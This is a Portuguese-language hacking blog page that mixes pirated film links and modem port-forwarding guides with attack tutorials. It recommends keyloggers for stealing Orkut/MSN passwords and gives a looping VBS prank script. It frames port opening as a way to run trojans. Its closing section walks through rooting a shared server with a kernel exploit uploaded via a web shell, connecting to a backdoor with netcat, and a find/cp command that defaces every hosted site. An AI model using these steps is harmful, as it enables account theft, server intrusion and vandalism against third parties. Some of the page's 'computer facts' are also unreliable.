Música da semana

Ha Tempos by Legião Urbana on Grooveshark

Enemy Hacking

Um mundo Hacker consciente onde você aprende com mais facilidade.

Enemy Hacking

Notícias e tutoriais em tempo real para facilitar ao aprendizado.

Enemy Hacking

Softwares totalmente gratuitos em versão Premmium.

Enemy Hacking

Junte-se a nós e faça parte de nossa equipe !

Enemy Hacking

Todos os direitos reservados 2011 ™

Plano de Vingança

 
FILMESONLINEGRATIS.NET Plano de Vingança
Título Original: Big Game
Áudio: Português
Legenda: S/L
Tempo de Duração: 101 minutos
Ano de Lançamento: 2008
País de Origem: EUA / Brasil
Gênero: Ação / Suspense / Thriller
Sinopse: Sully acaba de ser libertado da cadeia e jura vingar-se daquele que o prendeu, o então policial Reynolds (William Katt). Determinado a destruir a vida do ex-tira, o criminoso quer que ele pague pela morte de sua esposa grávida. E, para isso, monta um plano para atingir Reynolds no que ele tem de mais precioso: a filha Toni. Com mais dois amigos, Sully sai em busca da garota para sequestrá-la, mas esse tortuoso caminho da vingança conta ainda com mais ódio, surpresas e reviravoltas.

Clique para assistir o Filme
 Hospedor do Filme: MegaVideo

Toda forma de Amor - Dublado

 
FILMESONLINEGRATIS.NET Toda Forma de Amor
Título Original: Beginners
Áudio: Português
Legenda: S/L
Tempo de Duração: 104 minutos
Ano de Lançamento: 2010
País de Origem:EUA
Gênero: Comédia / Drama / Romance
Sinopse: Oliver conhece a irreverente e imprevisível Anna, alguns meses após seu pai Hal Campos ter falecido. Este novo amor preenche a memória de Oliver com recordações de seu pai, que saiu do armário aos 75 anos, após a morte de sua esposa de 45 anos, para viver uma vida completa e enérgica como gay que incluía um namorado mais jovem.

Clique aqui para assistir
Hospedor do Filme: Megavideo

A Saga Crepúsculo: Amanhecer

FILMESONLINEGRATIS.NET A Saga Crepúsculo: Amanhecer Parte 1   Legendado
Título Original: The Twilight Saga: Breaking Dawn – Part 1
Áudio: Inglês
Legenda: Português
Tempo de Duração: 117 minutos
Ano de Lançamento: 2011
País de Origem: EUA
Gênero:  Aventura / Drama
Sinopse:  Bella e Edward, recém-casados, é interrompida quando uma série de traições e situações adversas ameaça destruir o mundo deles. Após o casamento, Bella e Edward viajam até o Rio de Janeiro para a lua-de-mel, onde finalmente se entregam a suas paixões. Bella logo descobre que está grávida, mas a chegada da filha, Renesmee, coloca em movimento uma perigosa cadeia de eventos.

Clique aqui para assistir o filme
Hospedor do Filme: Megavideo

Filmes

Iremos disponibilizar aqui no Blog filmes online !

Scanner de Address e Exploits

Agora, essa vai para os criadores de Cheats de Games. Nossa equipe acaba de produzir um software capaz de, pesquisar os address de maneira correta e fixa, para cada modalidade haverá seu devido botão, ou seja, se você clicar Aimbot, o servidor irá pesquisar o address do mesmo.
  Não iremos disponibiliza-lo agora para download, iremos publicar após lançarmos a nossa área vip, e este produto será grátis por 2 dias.

TUTORIAL DEFINITIVO: Como Hackear Orkut ou MSN

Bem, sejamos bem claro que não existe nenhum tipo de programa milagroso que, em um só clique, a senha de sua vitima será enviada ao seu E-mail, na maioria dos programas desenvolvidos dessa forma ou estão infectados ou não possui nenhum meio de código.
  Nossa equipe recentemente, desenvolveu um programa com o mesmo gênero, porém, é um escaneador de dados que se instala no micro da vitima, fazendo assim, um sistema keylogger auto-infectavel.
 Sem mais, vamos então ao tutorial.
   A forma mais prática que achei sobre como hackear Orkut e Msn, é utilizando o famoso KL/Keylogger, onde é facilmente encontrado pelo Google.

Bankerfix

Bankerfix é um dos meus escaneadores favoritos, além de leve, ele é totalmente prático. Recomendo há todos.
  Além do mesmo fazer escaneamento em todas as áreas de seu micro, o mesmo ainda limpa os arquivos infectados que, mesmo os anti-vírus completos não conseguem captar.


Aviso: Membro VIP

Pessoal, desde há algum tempo venho planejando nos meus demais blogs em colocar um banco de dados nos meus sites, e com rankings, rankings esses que iram possibilitar você visualizar nossos conteúdos com seus demasiados níveis, que são eles: Free e Premmium.
 Obviamente os artigos Free são gratuítos e, para visualiza-los não é necessário o cadastro, porém os artigos Vip necessitam de cadastro e de mensalidade, ao se cadastrar iremos fornecer 5 horas vip para todos, sabendo também que, não há como burlar nosso sistema. O sistema de contas funciona de acordo com o seu ip, ou seja, você terá somente vip grátis na primeira conta que você criar, nas demais, virão Free.

Assustar seu amigo

Vamos causar um certo medo, e também fazer com que aquele amigo chato para de lhe pertubar, vamos bolar então um comando que deixa o windows "maluco".
Abra seu bloco de notas, copie o código abaixo e cole lá depois salve no final como vbs, EX: TESTE.vbs
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set  colCDROMs = oWMP.cdromCollection
if colCDROMs.Count = 1 then
do 
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next  ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject 
Next ' cdrom
loop
End If

Abrindo portas de quaisquer modem

Se voce nao consegue abrir a porta de seu modem para usar algum trojan entao siga esses tutoriais, procure seu modem e faça!


D-Link 502G e D-Link 500G Generation II


RDR – uma regra RDR permite disponibilizar um computador da LAN, tal como um servidor Web ou FTP, para usuários da internet, sem necessidade de obtenção de um endereço IP público para esse computador. O endereço IP privativo desse computador é traduzido para o IP público e vice-versa.

1 - Abra o navegador e digite: 10.1.1.1 para LAN e 10.1.1.2 para USB, login e senha: admin (o IP, o login e senha podem variar);
http://img161.imageshack.us/img161/6196/dl...portas01yg0.gif

2 - Clique na pasta Service, depois selecione Nat, Nat Rule Entry, ADD.
http://img161.imageshack.us/img161/8739/dl...portas02kw7.gif

3 - Na tela que se abrirá, preencha como na imagens abaixo, repare o numero que consta (caso haja algum) no campo "Rule ID", e prencha com o numero seguinte, ao terminar clique em submit.
http://img161.imageshack.us/img161/7742/dl...portas03km5.gif

4 - Vá para a pasta Admin, depois em Commit & Reboot, e clique em Save.
http://img161.imageshack.us/img161/391/dli...portas04wj3.gif
Pronto!!! O Redirecionamento das portas está terminado!!!


D-Link 500T


Este tutorial é destinado ao pessoal que possui um D-Link 500T. O procedimento de liberação de portas é o mesmo para alguns modems 502G e 500G Generation IV.

1 - Para configurar, digite o IP do seu modem (padrão: 10.1.1.1) no seu navegador, preferencialmente o Internet Explorer. A seguinte tela deverá aparecer:
http://img302.imageshack.us/img302/8629/mo...irewall1wi1.gif

2 - Login: admin, Senha, admin. Aperte Enter e teremos a tela a seguir:
http://img302.imageshack.us/img302/2788/te...mewizardqy5.gif

Existem duas maneiras de se liberarem as portas deste modem: por seleção de portas (opção de Servidor Virtual, ou Virtual Server ) ou por desmilitarização de IP (DMZ), que libera todas as portas de um determinado IP. A pedidos, vou fazer aqui as duas configurações.

Usando DMZ

3 - Clique em Advanced, depois em DMZ:
http://img302.imageshack.us/img302/7438/te...anceddmzhu4.gif

4 - Digite o IP da máquina a ter todas as portas liberadas. No meu caso, Ex: IP 10.1.1.100.
http://img302.imageshack.us/img302/8571/te...eenchidafr8.gif

5 - Clique em Apply.

Usando Virtual Server

3 - Clique em Advanced, depois em Virtual Server. Aparecerá a tela a seguir. Preencha conforme a imagem abaixo:
http://img302.imageshack.us/img302/1595/te...eenchidacl6.gif

Virtual Server

NAT (Network Address Translation): Determina se deve haver ou não tradução de pacotes de Internet para o seu IP diretamente. Deixe em Enabled (Habilitado).

Private IP: Especifica o IP local a ser aplicada a regra. Insira aqui o IP da sua placa de rede.

Protocol Type: Determina o protocolo a ser usado: TCP, UDP ou ALL (Todos).

Private Port: Porta da sua placa de rede a receber a regra. Deixe em Zero para todas as portas. Para uma única porta, especifique a porta usada.

Public Port: Aqui deve ser primeiro determinado como vai ser a liberação das portas: apenas uma porta (Single Port, aqui apenas o primeiro campo da esquerda é habilitado), um intervalo de portas (Port Range, os dois campos à esquerda são habilitados para preenchimento), qualquer porta (Any Port, não demanda preenchimento dos campos à esquerda), ou apenas as portas seguras (Safe Ports, não demanda preenchimento dos campos à esquerda).

4 - Clique em Apply.

Dps de fazer uma das duas maneiras faça isso, va em Tools, depois em Misc ou System e procure por Save and reboot. Tipo esse da imagem, clique e pronto , tipo na imagem:
http://img302.imageshack.us/img302/2483/telatoolsmiscsq5.gif

7 - Clique em Save and Reboot e Pronto.


SpeedStream 5200


1 - Para acessar configuração do modem, abra seu navegador e na barra de endereço digite: 192.168.254.254 e tecle Enter. Se este IP não funcionar, use o IP 10.0.0.1 que é o padrão de configuração das operadoras.
http://img302.imageshack.us/img302/5230/mo...00pppoa1gf0.gif

2 - A tela seguinte tela será apresentada: User Name: admin e Password: admin
http://img302.imageshack.us/img302/6446/mo...00pppoa2ex0.gif

3 - Clique em "Setup", "WAN Interface" e em seguida selecione a configuração de sua conexão:
http://img302.imageshack.us/img302/9908/mo...portas01ky3.gif

4 - Clique em Next.
http://www.portaladsl.com.br/img/modem_sie...T_portas_02.gif

5 - Clique em Next;
http://img302.imageshack.us/img302/2231/mo...portas03pd9.gif

6 - Clique em Next;
http://img302.imageshack.us/img302/7626/mo...portas04nt2.gif

7 - Desmarque a opção "Use Firewall", Marca a opção "Use Attack Detection System", Seleciona a opção "NAT", especifique o IP da sua máquina na rede local e clique em Next; Se, por exemplo, o seu modem usa o IP 10.0.0.1, e seu computador usa o IP 10.0.0.2, você deve colocar no NAT o IP 10.0.0.2.
http://img302.imageshack.us/img302/6333/mo...portas05rl9.gif

8 - Clique em Next;
http://img302.imageshack.us/img302/5972/mo...portas06ji7.gif

9 - Clique em "Finish";
http://img302.imageshack.us/img302/9627/mo...portas07uo1.gif

10 - Clique em "reboot";
http://img302.imageshack.us/img302/2238/mo...0pppoa12rq8.gif

11 - Clique em "reboot" para reinicializar o modem;
http://img302.imageshack.us/img302/2953/mo...0pppoa13kd3.gif

12 - Aguarde os 45 segundos da reinicialização do modem;
http://img302.imageshack.us/img302/7867/mo...0pppoa14fa7.gif

13 - Parabéns! sua Conexão está Ativa e com todas as portas liberadas!http://img302.imageshack.us/img302/337/modemsiemens5200pppoa15ei1.gif

14 - Não esqueça de desativar o firewall do sistema operacional, caso seja o Windows XP.


Siemens SpeedStream 5400

1 - Para começar, abra seu navegador de Internet e digite o endereço http://192.168.254.254.
http://img302.imageshack.us/img302/8707/mo...00pppoa1aq7.gif

2 - Use o login: admin, e senha: admin, como padrão.
A Telemar também usa em seus modems
usuário: TMAR#SSPE240006A03 e senha: SSPE240006A03.

3 - Clique em Configuração, depois em Redirecionamento de Porta. A tela abaixo aparecerá:
http://img302.imageshack.us/img302/87/tela...ntoportafq2.gif

4 - Configure segundo as orientações abaixo:

Acrescentar/Editar Entrada

Selecionar Protocolo: Selecione o protocolo referente à porta a ser aberta. Para o eMule, usa-se TCP para a porta 4662 e UDP para a 4672 .

Porta(s) TCP/UDP: Se você deseja liberar apenas uma porta com esta regra, coloque o número da porta no espaço da esquerda, deixando o espaço da direita vazio. Se você deseja liberar um intervalo de portas, coloque no espaço da esquerda a porta de início do intervalo e na direita a porta de fim do intervalo.

Redirecionar Protocolo/Serviço Selecionado a este Roteador/a este Endereço IP: Selecione a segunda opção, e especifique no espaço o endereço IP da máquina local a ter a porta liberada.

5 - Clique em Aplicar. Adicione todas as regras que quiser, depois clique em Reinicializar, no menu da esquerda.
http://img302.imageshack.us/img302/7065/te...cializarun9.gif

Seu modem está configurado.


Mais Modens


QuickConnect 5000



Digite no seu navegador o endereço:
http://www.portaladsl.com.br/Tutoriais/QC5000/tela1.jpg
A seguir aparecerá:
http://www.portaladsl.com.br/Tutoriais/QC5000/tela2.jpg

O Nome de usuário costuma ser: admin (minúsculo mesmo) e a senha deixe em branco e clique OK. Alguns modems também usam como nome de usuário admin e senha admin.

Ao dar OK aparecerá o menu de configuração do modem. Clique em NAT e aparecerá a tela abaixo:
http://www.portaladsl.com.br/Tutoriais/QC5000/tela5.jpg

Marque a caixa "Enable NAT" e clique em "Submit"
Vá em "Port Fowarding" e aparecerá o menu abaixo:
http://www.portaladsl.com.br/Tutoriais/QC5000/tela6.jpg

Preencha os campos e clique em "Add this Setting"
As regras no exemplo abaixo abrem a porta 4662/TCP e 4672/UDP para o eMule(No caso use 7171/TCP e 7171/TCP ou 9090/TCP 9090/TCP):
http://www.portaladsl.com.br/Tutoriais/QC5000/tela7.jpg

Ao terminar de adicionar as portas a serem abertas, vá ao menu "Save Settings" e aparecerá a tela abaixo:

Clique em SAVE
Aguarde o modem reiniciar e Pronto !!!

-------

DSLink 200U/E, 220E



Abrir o Internet Explorer (pode se usar o FireFox mas ele demora mais)
Digitar o IP de seu modem:
DS-Link's 192.168.1.1
D-Link 500G: 10.1.1.1
Ele pedirá usuario e senha
Login: root
senha: root
Caso não for isso, tente:
Login: admin
Senha admin
http://img204.imageshack.us/img204/4755/login4uftc7.jpg

Segundo passo:
Após o site aberto,
http://img204.imageshack.us/img204/1708/pagina2vrug2.jpg
Clique lá em cima na aba "Services"
Quando chegar lá na aba Services, verá um menuzinho ali, escrito "NAT Global Info"
Clique sobre ele e selecione "NAT Rule Entry"
http://img204.imageshack.us/img204/8825/services2kfao4.jpg

Terceiro passo:
Após selecionar NAT Rule Entry, você verá algumas regras já adicionadas.
Clique em "ADD"
Aparecerá esta janela, e conforme você verá na imagem abaxio. Deverá ser completada da mesma forma.
Rule: Deixar RDR
Rule ID: Colocar um número que não esteje na lista, na ordem crescente aos que ja tem.
IF Name: ppp-0
Protocol: TCP
Local Adress From: Ponha seu IP local, o da lan não o da internet.
Local Adress To: Ponha seu IP local, o da lan não o da internet.
Destination Port From: Ponha 7171, no caso para OTServ
Destination Port To: Ponha 7171, no caso para OTServ
Local Port: Ponha 7171, no caso para OTServ
Pronto, agora clique em "Submit".
http://img204.imageshack.us/img204/6111/add6mylb6.jpg

Quarto passo:
Pronto, agora sua regra esta adicionada, vamos salvar ela no modem, se não quando você o desligar ele irá perder ela.
Clique em na aba em cima "Admin"
logo abaixo clique em "Commit & Reboot"
Apenas clique em Commit e as configurações de seu modem estarão salvas
http://img204.imageshack.us/img204/4545/commit2gtgn1.jpg
Acho que ta certinho.
Se faltar alguma coisa, ou tiver algum erro ali, ou faltou explicação, por favor deixe um comentario, que eu arrumo assim que der


Para saber seu IP Local, o da rede. É muito simples. Abre o prompt do DOS. E digite ipconfig
Na linha: Endereço IP: esta seu IP local

Exemplo:
http://img164.imageshack.us/img164/9923/ipconfcb0.jpg
(Créditos Bagualas)

----------------

Huawei SmartAX MT880



1 - Abra seu navegador e digite o endereço http://192.168.1.1. A seguinte tela irá aparecer:
http://www.portaladsl.com.br/Tutoriais/MT880/Tela20.gif

2 - Utilize aqui o login TMAR#HWMT8007079 e senha HWMT8007079. Você verá esta tela:
http://www.portaladsl.com.br/Tutoriais/MT880/Tela1.gif

3 - Clique em NAT Configuration.
http://www.portaladsl.com.br/Tutoriais/MT880/Tela5.gif

4 - Clique em Port Mapping Set.
http://www.portaladsl.com.br/Tutoriais/MT880/Tela6.gif

5 - Siga as orientações abaixo para configurar.

NAT Server Set

Como se pode observar, a primeira regra serve para todas as portas (o que chamamos de DMZ, ou desmilitarização de IP, o que faz com que todas as portas do modem sejam redirecionadas para a máquina com o IP redirecionado). Somente recomendamos usar a regra de número 1 caso seu computador seja o único conectado ao seu modem, e caso você tenha uma boa proteção instalada em seu computador, pois seu computador ficará mais exposto com esta configuração.

Se você deseja redirecionar apenas algumas portas, utilize as regras 2 em diante.

Start Port No. (Número de Início de Portas): Especifica o início do intervalo de abertura de portas.
End Port No. (Número de Fim de Portas): Especifica o final do intervalo de abertura de portas. Caso você queira abrir apenas uma porta, coloque aqui a mesma coisa que no campo Start Port No.
IP Address: Coloque aqui o endereço IP local da máquina que receberá redireciomento de portas.

6 - Clique em Save. Depois, clique em Restart.
http://www.portaladsl.com.br/Tutoriais/MT880/Tela17.gif

7 - Clique no botão Restart.
http://www.portaladsl.com.br/Tutoriais/MT880/Tela19.gif

Seu modem está configurado.

--------

SpeedStream 4200


1- Abra o Internet Explorer e digite na Barra de Endereços: 192.168.254.254 e tecle enter ; Se este IP não funcionar, use o IP 10.0.0.1
http://www.portaladsl.com.br/img/siemens4200_01.gif

2- Digite seu nome de usuário e senha cadastrado no modem e clique em "OK";
http://www.portaladsl.com.br/img/siemens4200_portas_01.gif

3- Clique no menu "Configuração" e em seguida "Redirecionamento de porta";

3.1- Selecione Redirecionar protocolo/serviÇo selecionsado a este endereÇo IP: Insira o endereço IP interno de máquina, no caso minnha máquina tem o ip setado: 192.168.254.1
http://www.portaladsl.com.br/img/siemens4200_portas_02.gif

4 - Siga os passos clicando em "Selecionar protocolo" e selecione "TCP", digite as portas que você deseja abrir, exemplo "4662", depois em Address digite o IP da sua máquina e clique em "Aplicar";

5 - Repita o mesmo procedimento, mas em "Selecionar protocolo" selecione "UDP" e digite as portas que você deseja abrir, exemplo "4662" e depois clique em "Aplicar";
http://www.portaladsl.com.br/img/siemens4200_portas_04.gif

6- Após inserindo as portas que deseja liberar clique em aplicar e aparecerá a tela abaixo. (As portas liberadas abaixo são para ID Alta no Emule);
http://www.portaladsl.com.br/img/siemens4200_portas_05.gif

7- Parabéns!! Você liberou portas específicas no seu modem, as configurações foram salvas automaticamente, desligando seu modem, você não perderá a configuração.

------

D-Link 500b


Abra o seu navegador e digite
Usuário: admin
Senha: admin
e clique em "OK"

Clique no menu a esquerda em "Advanced Setup" e em seguida clica em "NAT" e depois em "Virtual Server" e ADD
E preencha dessa forma:

Server Name: Selecione Custom application e digite Tibia(Ou oque quiser)
Server IP Address: O ip do computador
External Port Start: 7171
External Port End: 7171
Protocol: TCP
Internal Port Start: 7171
Internal Port End: 7171

E clique em Save/Apply
Repita o processo caso queira desbloquear mais de uma porta
e Pronto!! ;D

------

SpeedTouch 510 V5/6



Veja o ip do seu computador
Abra o internet explorer e digite no navegador: http://192.168.1.254

Usuário: Administrator
Senha: "deixar em branco"

Vá em Advanced/Napt/
Clique em new e preencha:

Protocol: TCP
Inside IP: O ip do seu computador
Inside Port: Porta que você deseja desbloquear
Outside Port: Porta que você deseja desbloquear
Outside IP: Não mecha

Depois clique em Apply e clique em Save All no menu da direita do modem perto do advanced.

Repita o processo caso queira desbloquear mais de uma porta
e Pronto!! ;D

-------


Parks Altavia 671


1 - Para começar, abra seu navegador de Internet e digite o endereço http://192.168.1.1. A seguinte tela deverá aparecer.
http://www.portaladsl.com.br/Tutoriais/Alt...la_conectar.gif

2 - Use o login: root; senha: 1234 para se conectar. Clique em Ok e teremos a seguinte tela:
http://www.portaladsl.com.br/Tutoriais/Alt...cesscontrol.gif

3 - Clique em NAPT.
http://www.portaladsl.com.br/Tutoriais/Alt...1/tela_napt.gif

4 - Clique em Add. Preencha a tela abaixo com os dados explicados abaixo.
http://www.portaladsl.com.br/Tutoriais/Alt...1/tela_napt.gif

Redirect Port Configuration
Public Port: Porta do modem a ser liberada. Por exemplo: se você quer abrir portas pro eMule, coloque aqui o número 4662.
Protocol: Especifica o protocolo de uso. Para a porta 4662 do eMule, deixe em TCP.
Local Address: Coloque aqui o IP da máquina a ter a porta redirecionada para o modem.
Local Port: Porta da máquina local, a ser redirecionada para a porta do modem. Coloque o mesmo valor da Public Port (porta pública).

5 - Clique em Apply. No exemplo abaixo, foi usada a porta 4672, também do eMule. Pode acontecer como neste modem, de aparecer entradas repetidas, mas isso é normal.
http://www.portaladsl.com.br/Tutoriais/Alt...napt_add_ok.gif

6 - Adicione todas as portas desejadas, depois clique em Save & Reboot.
http://www.portaladsl.com.br/Tutoriais/Alt..._savereboot.gif

7 - Clique em Save, espere a tela aparecer, depois clique em Reboot.
http://www.portaladsl.com.br/Tutoriais/Alt...gsuccesfull.gif

Seu modem está configurado.
-----

D-Link 500G Generation II

Primeiro passo:
Abrir o Internet Explorer (pode se usar o FireFox mas ele demora mais)
Digitar o IP de seu modem:
D-Link 500G: 10.1.1.1
Ele pedira usuario e senha
Login: admin
Senha admin
http://img204.imageshack.us/img204/4755/login4uftc7.jpg

Segundo passo:
Após o site aberto,
http://img207.imageshack.us/img207/630/tela8molq3.jpg

Clique no lado esquerdo no menu: "Services"
Quando chegar lá na no meu Services , verá um menuzinho no centro, escrito "NAT Global Info"
Clique sobre ele e selecione "NAT Rule Entry"
http://img207.imageshack.us/img207/4189/netrule0gtcy5.jpg

Terceiro passo:


Após selecionar NAT Rule Entry, você verá algumas regras já adicionadas.
Clique em "ADD"
http://img207.imageshack.us/img207/166/add9xoph2.jpg

Aparecerá esta janela, e conforme você verá na imagem abaxio. Deverá ser completada da mesma forma.

Rule: Deixar RDR
Rule ID: Colocar um número que não esteje na lista, na ordem crescente aos que ja tem.
IF Name: ppp-0
Protocol: TCP
Local Adress From: Ponha seu IP local, o da lan não o da internet.
Local Adress To: Ponha seu IP local, o da lan não o da internet.
Destination Port From: Ponha 7171, no caso para OTServ
Destination Port To: Ponha 7171, no caso para OTServ
Local Port: Ponha 7171, no caso para OTServ
Pronto, agora clique em "Submit".
http://img207.imageshack.us/img207/5526/liberando3dlya5.jpg

Quarto passo:
Pronto, agora sua regra esta adicionada, vamos salvar ela no modem, se não quando você o desligar ele irá perder ela.
Clique no meu a esquerda em "Admin"
o meu irá expandir e logo abaixo clique em "Commit & Reboot"
Apenas clique em Save as configurações de seu modem estarão salvas
http://img207.imageshack.us/img207/6084/comit7oazv5.jpg

Para liberar o acesso ao site, no caso apache, apenas siga o mesmo procedimento, apenas trocando da porta 7171 para 8080 ou 8090.

E depois abrindo a config do apache, geralmente httpd.conf e adicionando o texto "Listen 8080" sem as aspas ou "Listen 8090".

Créditos: TSH

Acelerando a internet

Um tutorial bem prático que pode melhorar e muito a vida de muitos internautas, neste tutorial, irei ensinar a como acelerar a internet. Siga abaixo o que se pede.
- Primeiramente abra o executar "TECLA WINDOWS + R"
- Agora escreva Regedit
- Procure por HKEY_LOCAL_MACHINE e clique nele
- Agora, vá em SYSTEM
- ControlSET01
- Tcpip (Observe que a tabela está em ordem alfabética)
- ServiceProvider
 Agora, mude os seguintes valores.

CLASS – 1
DNSPRIORITY – 7
HOSTSPRIORITY – 6
LOCALPRIORITY – 5
NETBTPRIORITY – 8

Espero que tenha ajudado !

20 coisas que você deve saber sobre computador

1. Faz mal ao computador ter ímãs colados no gabinete.

Verdadeiro.”Imãs no gabinete podem afetar o HD, onde os dados são gravados magneticamente.
Na verdade esse é o maior problema dos imãs”.Gladiador.

2. Empurrar o cd com o dedo para inseri-lo no gabinete é prejudicial ao equipamento.

Falso. Nada a ver. Nada irá acontecer se você empurrar com uma força
normal. Foi feito exatamente para isso. Mas se empurrar com força excessiva, vai fazer as partes mecânicas girarem muito mais rápido do que o normal, e poderá danificar o drive.

3. Água ou café derramada sobre o teclado pode arruinar seu funcionamento.

Verdadeiro. Estragam as trilhas metalizadas que estão embaixo das
teclas. Podem criar um curto-circuito e queimar.

4. É necessário ter espaço entre o monitor e a parede atrás dele.

Falso. Monitor não é geladeira. O ambiente em geral deve estar
ventilado, mas não é indispensável que seja muita a distância. É muito pior
ter outro monitor atrás (como acontece em muitos escritórios) porque pode
haver o risco de ter interferências entre os computadores.

5. Quando o computador passou a noite toda ligado, é melhor desliga-lo e voltar a reiniciar.

Falso. Pode seguir ligado sem problema algum. Ainda que pareça o
contrário e dê vontade de desliga-lo um momento para que descanse, seguindo
a lógica humana, o HD dura muito mais se permanecer ligado e não sendo o
tempo todo ligado e desligado. Por uma questão de economia de energia, não
convém deixar ligado por vários dias, mas se não levarmos em conta o fator
do aquecimento global seria muito melhor para o PC nunca desliga-lo. Eles
foram criados para isso.

6. Gasta mais energia ao ser ligado do que em várias horas de uso.

Falso. Ao ligar não consome tanto como para superar as horas de
funcionamento. Ao desligar poupa-se energia e se permanecer ligado gasta,
como qualquer outro eletrodoméstico.

7. Faz mal ao computador ter algum celular por perto.

Falso. Sem problema algum, no máximo um ronco provocado pela
interferência de uma chamada.

8. Depois de desligar o computador é melhor deixa-lo descansar uns segundos antes de voltar a ligar.

Verdadeiro. É recomendável esperar no mínimo alguns segundos antes de
voltar a liga-lo. 10 segundos deve ser o suficiente.

9. Mover o gabinete quando o computador está ligado pode queimar o HD.

Falso. A força centrífuga com que gira o HD é tanta que não acontece
nada ao se mover o gabinete. Muito menos ainda em se tratando de um notebook,
porque eles foram feitos para isso. Mas é lógico que você não vai sair por
aí dando porrada no equipamento, né?

10. Pelo bem do monitor, é conveniente usar protetor de tela quando não está em uso.

Verdadeiro. Porque o mecanismo do protetor de tela faz com que o
desgaste das cores da tela seja uniforme. Ao renovar as imagens
constantemente, não se gasta num mesmo lugar.

11. Quando há chuva forte, é absolutamente necessário tirar o plugue do computador da tomada.

Verdadeiro. Deveria ser adotado como uma obrigação no caso de uma chuva
muito forte, com muitos raios e trovões. Da mesma forma, é aconselhável
retirar os cabos do telefone e da alimentação do modem para que não queimem
com a descarga de raios.

12. Não é conveniente olhar a luz vermelha que está embaixo do mouse óptico.

Verdadeiro. Pode até não deixar ninguém cego, mas é uma luz bastante
forte que pode sim fazer mal a retina.

13. Nos notebooks deve-se acoplar primeiro o cabo de eletricidade à máquina e somente depois esse cabo a tomada.

Falso. Tanto faz. Quase todos os equipamentos portáteis atuais tem
proteção de curto-circuito e são multi-voltagem, podem ser ligados em
tensões de 90 a 240 volts, pelo que são sumamente estáveis.

14. Ao desligar o computador convém também desligar o monitor.

Falso. Outra vez, tanto faz. Ao desligar o computador, o monitor fica num
estado em que consome muito pouca energia (pouca coisa mais que 1W) e não
sofre desgaste algum. A decisão termina sendo em função da economia, ainda
que o consumo seja realmente mínimo.

15. Não se deve colocar cds, disquetes ou qualquer outro elemento sobre o gabinete.

Falso. Lógico, nada do que é colocado sobre o gabinete pode ser afetado ou
avariado, a não ser que esteja úmida e a água possa chegar ao equipamento.

16. O computador nunca pode ficar ao sol.

Verdadeiro. Se ele esquentar mais do que o habitual, sua vida útil tende
a decrescer. Por isso nunca é boa idéia instalar o PC próximo a janelas onde
bate o sol.

17. Se mais de 80% do HD tiver sendo usado, a máquina se torna mais lenta.

Verdadeiro. Sempre é uma questão de porcentagem. Por mais que se tenha
20 Gb livres, se for menos de 20% da capacidade do disco, o funcionamento do
computador será lento.

18. Não se deve tirar o pen drive sem avisar à máquina.

Verdadeiro. Deve ser selecionada a opção ‘Retirar hardware com
segurança’ antes de retira-lo. Caso contrário, corre-se o risco de queimar a
memória do USB.

19. Ter o desktop cheio de ícones deixa o computador mais lento.

Verdadeiro. Não importa se são ícones de programas ou arquivos. O que
acontece é que a placa de vídeo do computador renova constantemente a
informação apresentada na tela, e quanto mais ícones, mais tempo.

20. Desligar a máquina diretamente no botão, sem selecionar previamente a opção de desligar o equipamento, estraga o HD.

Verdadeiro. O HD pode queimar ao ser desligado enquanto ele ainda está
lendo ou escrevendo em alguma parte do sistema. Ademais, quando a energia é
desligada subitamente, as placas que cobrem o disco (que gira até 10 mil
rotações) descem sobre ele e podem ir riscando até que alcancem a posição de
descanso. Ao selecionar a opção ‘Desligar o Computador’, todo o sistema se
prepara para repousar e suspende todas as atividades. Cada peça vai ficar em
seu devido lugar.

Local root e Mass deface

a escalação de privilegio e conseguir o root sem a senha. e fazer um possivel mass deface. lembrando que "mass deface" é uma tecnica que muda todas as index dos sites hospedados no mesmo servidor.
-
Primeiro de tudo vamos ver qual que é versão do kernel que o servidor esta usando neste caso é "2.6.18"



Agora o que temos que fazer é simples, vamos encontrar uma XPL para essa versão do kernel, xpl é o exploit para fazer o privilegio escalation (local root exploit) vocês podem procurar xpls em sites como exploit-db, inj3ct0r e até mesmo no google. um outro otimo site também é esse:
-
http://tarantula.by.ru/localroot/
-
agora digamos que vc ja achou a xpl para esta versão do kernel, na maioria das vezes são exploits feitos em linguagem 'C' então utilize o linux e compile com gcc, porque o windows e seus compiladores é faill. apos ter compilado a xpl upe ela pela shell que vc deve ter upada no site no qual quer rootar o servidor. apos ter upado a xpl, agora vamos instalar um backdoor no site, geralmente todas as shells ja vem com uns tool que permite instalar o backdoor..


Agora depois de instalado o backdoor vamos fazer conexão com a porta selecionada para o backdoor, para fazer a conexão podemos utilizar qualquer programa que faça a conexão com a porta, mas eu recomendo o 'netcat' vamos conectar com o netcat utilizando o comando: nc IP 5997 apos conectar com o backdoor temos que ir no diretorio no qual vc fez o upload da xpl.



agora vamos apenas executar pelo o backdoor a xpl upada, com o comando ./2.6.18 e esperar terminar a execusão da xpl, no caso esse 2.6.18 <~ é o nome da xpl upada la no site. apos terminar a execusão digite: 'id' e se foi feito com sucesso vai aparecer isso: uid=0(root) gid=0(root) groups=0(root) então isso siguinifica que vc esta como root já agora podemos fazer qualquer coisa no servidor inclusive um mass deface =P segue o tutorial para fazer o 'mass'.
-
Vamos ah um site que mostre todos os sites hospedado no mesmo servidor do site que queremos ownar. eu recomendo o:
www.onthesamehost.com eu uso ele. mas pode ser outro.
-
Agora voltamos ao backdoor e vamos upar nossa index para deface, tendo a index upado pegue o diretorio no qual ela se encontra. exemplo: /htdocs/2010/imagens/index.html agora vamos usar o seguinte comando para realizar o mass deface:
-

find /diretorios que estão os sites/ -name "index.*" -exec cp sua index upada {} \;

-

explicando: em "/diretorios que estão os sites/" vc deve colocar o diretorio no qual se encontra os sites no servidor. exemplo: "/home/sitevuln/attpd/htdocs/" <~ diretorio onde estão os sites

-
em sua index upada vc coloca o diretorio da sua index upada. exemplo: /htdocs/2010/imagens/index.html
-
E pronto mudando isso deve ficar assim:

find /home/attpd/htdocs/ -name "index.*" -exec cp /home/site/htdocs/2010/imagens/index.html {} \;

-
Agora basta executar esse comando e esperar terminar depois vá la no 'onthesamehost' e veja os sites e clique neles e veja que todas as index dos sites hospedado no mesmo servidor foram mudadas . e pronto mass concluido.

usando tool mass deface, esse tol foi feito para diminuir um pouco do trabalho... apenas upe o tool pela shell
e execute ele assim pelo backdoor. o modo de uso é:
-
usage : perl MSRml.pl <~ diretorio da sua index upada.
-
